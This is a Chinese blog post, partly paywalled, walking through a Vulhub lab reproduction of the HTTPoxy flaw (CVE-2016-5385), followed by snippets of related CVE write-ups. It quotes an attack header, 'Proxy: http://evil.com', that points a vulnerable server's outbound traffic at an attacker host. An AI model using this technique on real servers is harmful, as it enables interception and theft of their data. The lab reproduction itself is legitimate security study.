Vulhub靶场CGI HTTPoxy漏洞复现(CVE-2016-5385)

最新推荐文章于 2024-10-16 16:00:00 发布
原创 最新推荐文章于 2024-10-16 16:00:00 发布 · 502 阅读 · 2
标签
#安全 #web安全
本文详细介绍了如何复现一个与CGI(fastcgi)相关的安全漏洞,该漏洞允许恶意用户通过特定的HTTP头设置服务器的代理,可能导致数据泄露。复现过程包括启动靶场环境、修改HTTP请求头、使用BurpSuite重放请求,并在KaliLinux上监听代理数据包。文章适用于系统安全测试和漏洞研究。

免责声明:本文仅用于技术交流和知识分享目的。漏洞复现涉及到系统和网络的安全性测试,可能导致系统崩溃、数据丢失或其他问题。读者在尝试漏洞复现之前必须获得合法授权,并自行承担一切风险和责任。

漏洞描述:

根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中地址。于是,恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头,将使用缺陷类库的网站的代理设置为`http://evil.com`,进而窃取数据

漏洞影响版本:

>PHP5.6.24

漏洞复现版本:

PHP 5.6.23 + GuzzleHttp 6.2.0

复现过程:

1:使用vulhub中靶场启动环境

2:浏览器访问http://your-ip:8080/index.php


3:将数据包发送至burp的repeater模块重放,origin显示的是你的真实访问IP

4: kali上起一个监听作为proxy代理

最低0.47元/天 解锁文章
3ize0f
关注
cgi web 调用多次启动_简单说明CGI和动态请求是什么
weixin_39517902的博客
11-27 1043
1. CGI是什么CGI是common gateway interface的缩写,大家都译作通用网关接口,但很不幸,我们无法见名知意。我们知道,web服务器所处理的内容都是静态的,要想处理动态内容,需要依赖于web应用程序,如php、jsp、python、perl等。但是web server如何将动态的请求传递给这些应用程序?它所依赖的就是cgi协议。没错,是协议,也就是webserve...
[Vulhub](CVE-2012-1823)PHP-CGI远程代码执行漏洞
weixin_45605352的博客
03-28 3186
首先理解一下CGI的概念: CGICGI 全称是“公共网关接口”(Common Gateway Interface),HTTP 服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。 CGI 可以用任何一种语言编写,只要这种语言具有标准输入、输出和环境变量。如 PHP, Perl, Tcl 等。 作用: CGI是一种根据请求信息动态产生回应内容的技术。 通过CGIWeb服务器可以根据请求不同启动不同的外部程序,并将请求内容转发给该程序,在程序执行结束后,将执行结果作为回应返
利用Vulnhub复现漏洞 - HTTPoxy漏洞CVE-2016-5385
JiangBuLiu的博客
07-09 2570
HTTPoxy漏洞CVE-2016-5385)Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现端口设置浏览器设置BurpSuit设置发出请求 Vulnhub官方复现教程 https://vulhub.org/#/environments/cgi/httpoxy/ 漏洞原理 参考:http://www.laruence.com/2016/07/19/3101.html 简单来说,根据RF...
Vulhub漏洞系列:HTTPoxy漏洞CVE-2016-5385
weixin_43072923的博客
05-19 3068
Vulhub漏洞系列:HTTPoxy漏洞CVE-2016-5385)00.前言:01.HTTPoxy简介02.漏洞描述03.漏洞复现 00.前言: 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.HTTPoxy简介   httpoxy是一个CGI应用环境的远程利用漏洞,影响一系列以PHP为主要代表的Web动态语言和Apache、Nginx等Web服务器。 02.漏洞描述   根据RFC 3875规定,CGI(fastcgi)要将用户传入的所
PHP HTTPoxy CGI 应用程序漏洞 CVE-2016-5385
qq_42430287的博客
12-21 929
PHP HTTPoxy CGI 应用程序漏洞 CVE-2016-5385
vulhub漏洞复现五_cgi
weixin_44193247的博客
01-06 637
vulhub漏洞复现练习篇
Tomcat漏洞修复纪实
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
07-25 8195
Tomcat漏洞修复纪实 【事件描述】 最新集团扫描出一堆安全漏洞,要求限期整改,现场环境实际用的时候Apache Tomcat/7.0.94,漏洞见下图: 【漏洞修复评估】 1、漏洞修复补丁官网: http://tomcat.apache.org/security-7.html http://tomcat.apache.org/security-8.html http://tomcat.apa...
HTTPoxy漏洞CVE-2016-5385
EC_Carrot的博客
07-01 545
漏洞背景 PHP 7.0.8及之前的版本中存在安全漏洞,该漏洞源于程序没有解决RFC 3875模式下的命名空间冲突。程序没有正确处理来自HTTP_PROXY环境变量中不可信客户端数据应用程序。远程攻击者借助HTTP请求中特制的Proxy header消息利用该漏洞实施中间人攻击,指引服务器发送连接到任意主机。 漏洞复现 我直接弃坑,但是有几位师傅写的都很不错: https://blog.csdn.net/JiangBuLiu/article/details/95218436 https://blog.cs
httpoxy漏洞CVE-2016-5385
温和的跳跃
07-30 1396
CGI(RFC 3875) 的模式的时候,会把请求中的 Header,加上HTTP_前缀,注册为环境变量,所以如果你在 Header 中发送一个Proxy:xxxxxx,那么 PHP 就会把他注册为http_proxy环境变量 就是说 你写的proxy会成为人家服务器的http_proxy环境变量,人家服务器以后想通过代理请求点什么,你都会知道。都会被代理到攻击者想要的地址,之后攻击者就可以伪造,监听,篡改你的请求了… 这是目前发现的最好玩的漏洞了 简单又好玩 参考链接 ...
Flag配送中心(CVE-2016-5385)
ce666666的博客
01-16 2409
前言 借着这道题,对CVE-2016-5385这个漏洞进行复现漏洞原理 CGI模式中会把请求的Header,加上HTTP_前缀,注册为环境变量.你在>Header发送proxy:ip:port,php服务器会把他注册为http_proxy环境变量 你的proxy会成为人家服务器的http_proxy环境变量,服务器通过代理请求的信息都会发到你代理的地址。 过程是: A向B 发送请求,B会处理A发来的信息并发给A 如果A挂上C的proxy(可以是C的IP地址),这时候B收到A的请求并处理A发
vulhubhttpoxy漏洞CVE-2016-5385
qq_45300786的博客
09-13 1255
这个httpoxy漏洞,简单来说,就是可以截获用户http请求包,从而获取到一些敏感信息。 httpoxy简单理解 https://blog.csdn.net/zuoside__lord/article/details/107696503 NC监听 https://blog.csdn.net/qq_34640691/article/details/115740809?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7ECTRL
HTTPoxy CGI应用程序漏洞CVE-2016-5385
willow_liang的博客
04-15 1683
CGI简介 CGI(Common Gateway Interface)公共网关接口,是外部扩展应用程序与 Web 服务器交互的一个标准接口。服务器端与客户端进行交互的常见方式多,CGI 技术就是其中之一。根据CGI标准,编写外部扩展应用程序,可以对客户端浏览器输入的数据进行处理,完成客户端与服务器的交互操作。CGI规范定义了Web服务器如何向扩展应用程序发送消息,在收到扩展应用程序的信息后又如何进行处理等内容。对于许多静态的HTML网页无法实现的功能,通过 CGI可以实现,比如表单的处理、对数据库的访问、
Apache Tomcat httpoxy 安全漏洞 CVE-2016-5388 已亲自复现
qq_42430287的博客
12-20 3384
攻击者构造HTTP请求的Proxy字段为True,表示启用了代理。这意味着所有的网络请求将会通过一个中间代理服务器转发,而不是直接连接到目标服务器。但是,通常情况下,仅设置"proxy: true"是不够的,还需要提供代理服务器的详细信息,如IP地址和端口号。如果攻击成功,在响应头中返回的状态码为200,且与提供代理服务器存在流量交互。然而,在响应头中返回状态码为200,且在响应体中返回的JSON对象似乎是在响应一个成功的操作请求,返回了一个包含版本、故事、步骤和规则的配置或脚本内容。
Weblogic相关漏洞
谢公子的博客
01-14 5443
目录 Weblogic Weblogic出现过的漏洞 SSRF(CVE-2014-4210) 任意文件上传(CVE-2018-2894) JAVA反序列化 CVE-2015-4852 CVE-2016-0638 CVE-2016-3510 CVE-2017-3248 Weblogic WLS Core Components 反序列化命令执行漏洞CVE-2...
HTTPOXY漏洞下的思考
程序老兵的博客
07-19 994
晚晚刷微博看到最新爆出的httpoxy远程代理感染漏洞的介绍 今天中午看到鸟哥(风雪之隅)博客更新了:http://www.laruence.com/2016/07/19/3101.html 摘录重点: 在CGI(RFC 3875)的模式的时候, 会把请求中的Header, 加上HTTP_ 前缀, 注册为环境变量, 所以如果你在Header中发送一个Proxy:xxxxxx, 那么P
vulhub复现记录
最新发布
书山有路勤为径,学海无涯苦作舟
10-16 2159
看作者下面的解释可以知道,自 2022 年 2 月起,作为 Docker Compose V2023 的子命令合并到 Docker 中,Python 版本的将在 年 月之后弃用。但是由于我之前在CentOS搭建了老的docker,所以就继续使用,老的docker-compose.其中遇到不少坑,就浅浅的记录一下吧。
常见框架漏洞复现
2301_80402555的博客
09-23 3988
漏洞根本源于 thinkphp/library/think/Request.php 中method方法可以进行变量覆盖,通过覆盖类的核心属性filter导致rce,其攻击点较为多,有些还具有限制条件,另外由于种种部分原因,在利用上会出现一些问题。编辑请求头,增加Range: bytes=0-18446744073709551615字段,若返回码状态为416。HTTP.SYS远程代码执⾏(MS15-034) MS-->Microsoft 2015 -034。值,若有,则证明该系统使⽤了Shiro框架。
Cve-2016-2776复现
Yale的博客
04-02 1492
Cve-2016-2776 背景: 攻击者通过向BIND 9发送精心构造的DNS请求,使其在构造响应包时错误计算所需保留空间的长度,导致后续断言失败进而终止程序,从而可以达到拒绝服务的目的。(当DNS服务器构建对精心设计的查询的响应时,可以触发此特定漏洞,其中响应大小超过默认DNS响应大小512) 当DNS服务器构造DNS查询的响应时,它会在响应缓冲区(默认大小为512)中保留空间,它将按照Ans...
[CVE-2016–3714]-Imagetragick 命令执行漏洞复现
https://www.cnblogs.com/zpchcbd/
08-13 847
路径:/root/vulhub/imagemagick/imagetragick 搭建:docker-compose up -d 打开地址:存在三个文件demo.php upload.php vul.jpg vul.jpg是攻击的模板 push graphic-context viewbox 0 0 640 480 fill 'url(https://example.com/image.jpg...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值